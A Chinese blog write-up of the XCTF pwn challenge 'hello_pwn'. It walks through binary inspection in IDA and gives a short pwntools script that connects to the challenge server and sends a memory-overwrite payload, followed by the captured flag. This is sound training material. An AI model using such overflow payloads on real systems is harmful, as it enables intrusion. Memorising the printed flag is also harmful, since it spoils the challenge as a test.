XCTF|PWN-hello_pwn-WP

"本文档描述了通过下载文件、使用Linux命令检查文件属性、利用IDA进行逆向工程来查找关键字符串的过程。在64位IDA中,找到了字符串'catflag.txt'的地址,并在main函数中发现关键信息。最终,通过编写并运行Python代码,成功获取了flag:cyberpeace{95a4f64051312552b152a0c8d40280c8}
摘要由CSDN通过智能技术生成

1、下载文件并开启靶机

2、用Linux查看该文件信息

checksec 2

3、该文件是64位的文件,用64位IDA打开该文件

        3.1、shift+f12查看该文件关键字符串

        3.2、双击关键字符串,再按ctrl+x查看"cat flag.txt"的地址

"cat flag.txt"地址:0x400686 

        3.3、按f5进入main函数

 两个函数相差4个字节

4、编译代码

#encoding=utf-8


from pwn import *                        #导入pwntools中pwn的所有内容
p = remote("111.200.241.244",51608)      #链接服务器远程交互
    
p.sendline(b'a'*4+b'aaun')               #覆盖地址
p.interactive()                          #反弹shell进行交互

 

5、flag为:

cyberpeace{95a4f64051312552b152a0c8d40280c8}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值